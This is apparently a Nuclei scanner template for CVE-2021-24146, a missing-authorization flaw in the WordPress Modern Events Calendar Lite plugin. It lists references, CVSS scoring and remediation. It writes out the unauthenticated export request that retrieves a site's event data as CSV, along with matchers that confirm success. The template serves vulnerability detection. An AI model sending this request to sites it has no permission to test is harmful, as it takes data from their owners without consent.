id: CVE-2021-24146 info: name: WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure author: random_robbie severity: high description: WordPress Modern Events Calendar Lite before 5.16.5 does not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format. remediation: | Update to the latest version of the Modern Events Calendar Lite plugin (5.16.5 or higher) to fix the vulnerability. reference: - https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc - http://packetstormsecurity.com/files/163345/WordPress-Modern-Events-Calendar-5.16.2-Information-Disclosure.html - https://nvd.nist.gov/vuln/detail/CVE-2021-24146 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N cvss-score: 7.5 cve-id: CVE-2021-24146 cwe-id: CWE-862,CWE-284 epss-score: 0.0212 epss-percentile: 0.87966 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: webnus product: modern_events_calendar_lite framework: wordpress tags: cve2021,wpscan,packetstorm,wordpress,wp-plugin,cve http: - method: GET path: - "{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv" matchers-condition: and matchers: - type: word part: header words: - "mec-events" - "text/csv" condition: and - type: status status: - 200 # digest: 4b0a00483046022100c838556e283f0253264b47071598bb1ad22a520c5b60f3bc5f6d1f0c8edf5c05022100fc0f191c3b4b9448e1cee2951b402a765e94a99e404513d416fc537dc1a19867:922c64590222798bb761d5b6d8e72950